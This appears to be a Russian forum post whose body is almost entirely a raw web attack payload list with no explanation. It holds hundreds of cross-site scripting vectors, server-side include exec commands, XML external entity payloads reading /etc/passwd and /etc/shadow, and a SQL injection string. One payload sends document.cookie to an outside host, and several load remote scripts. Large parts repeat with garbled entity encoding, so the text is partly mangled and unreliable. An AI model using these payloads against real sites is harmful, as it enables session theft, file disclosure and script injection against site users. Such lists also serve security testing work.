SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6&#09;6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> document.vulnerable=true; <img /> <img /> <img /> <document.vulnerable=true;//< document.vulnerable=true; <img iframe="" script="" />a=/XSS/\ndocument.vulnerable=true; \";document.vulnerable=true;;// document.vulnerable=true; <input type="IMAGE" /> <body> <img dynsrc="javascript:document.vulnerable=true;" /> <img lowsrc="javascript:document.vulnerable=true;" /> <bgsound> <br size="&{document.vulnerable=true}" /> <layer></layer> <link rel="stylesheet" /> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</style><ul><li>XSS <img /> 1script3document.vulnerable=true;1/script3 <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;" /> <meta http-equiv="refresh" content="0; URL=http://;URL=javascript:document.vulnerable=true;" /> <iframe>
    exp/* <![]] +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- & &{document.vulnerable=true;}; <img src="mocha:document.vulnerable=true;" /> <img src="livescript:document.vulnerable=true;" /> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;" /> <div style="background-image: url(javascript:document.vulnerable=true;"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style=""> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style>document.vulnerable=true;//--> <document.vulnerable=true; <![<!--]]<script>document.vulnerable=true;//--> <!-- -- -->document.vulnerable=true;<!-- -- --> <xml> <xml id="X"><a><b>document.vulnerable=true;; <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta http-equiv="Link" content="<http://www.securitycompass.com/xss.css>; REL=stylesheet" /> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <object type="text/x-scriptlet" data="http://www.securitycompass.com/scriptlet.html"></object> <html xmlns:xss=""><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> " '' SRC="http://www.securitycompass.com/xss.js"> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"> ` SRC="http://www.securitycompass.com/xss.js"> document.write("<SCRI");PT SRC="http://www.securitycompass.com/xss.js"> <div style="binding: url('http://www.securitycompass.com/xss.js');"> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> ">alert('XSS') </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMG SRC = "; j a v a s c r i p t : a l e r t '; X S S '; ) "; >; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";h tt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; <;A HREF=";//www.google.com/";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";http://google.com/";>;XSS<;/A>; <;A HREF=";http://www.google.com./";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; document.vulnerable=true; <img /> <img /> <img /> <document.vulnerable=true;//< document.vulnerable=true; <img iframe="" script="" />a=/XSS/\ndocument.vulnerable=true; \";document.vulnerable=true;;// document.vulnerable=true; <input type="IMAGE" /> <body> <img dynsrc="javascript:document.vulnerable=true;" /> <img lowsrc="javascript:document.vulnerable=true;" /> <bgsound> <br size="&{document.vulnerable=true}" /> <layer></layer> <link rel="stylesheet" /> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</style><ul><li>XSS <img /> 1script3document.vulnerable=true;1/script3 <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;" /> <meta http-equiv="refresh" content="0; URL=http://;URL=javascript:document.vulnerable=true;" /> <iframe>
exp/* <![]] +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- & &{document.vulnerable=true;}; <img src="mocha:document.vulnerable=true;" /> <img src="livescript:document.vulnerable=true;" /> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;" /> <div style="background-image: url(javascript:document.vulnerable=true;"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style=""> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style>document.vulnerable=true;//--> <document.vulnerable=true; <![<!--]]<script>document.vulnerable=true;//--> <!-- -- -->document.vulnerable=true;<!-- -- --> <xml> <xml id="X"><a><b>document.vulnerable=true;; <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta http-equiv="Link" content="<http://www.securitycompass.com/xss.css>; REL=stylesheet" /> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <object type="text/x-scriptlet" data="http://www.securitycompass.com/scriptlet.html"></object> <html xmlns:xss=""><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <foo><![CDATA[' or 1=1 or ''=']]> <!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> alert('XSS') %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <img /> <img /> <img /> <IMG """>alert("XSS")"> <img /> <img /> <img /> <img /> <img /> <img /> <body> <input type="IMAGE" /> <img iframe="" src="http://ha.ckers.org/scriptlet.html" script="" />alert("XSS");//< %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie) fooalert(1) <script>alert(1)</script> String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) =(◕_◕)=</body></foo></html></b></a></xml></xml></object></div></div></div></div></a>

Это интересно
+5

bettar***@y*****.ru 08.09.2016 , обновлено  26.10.2018
Пожаловаться Просмотров: 712  
←  Предыдущая тема Все темы Следующая тема →


Комментарии временно отключены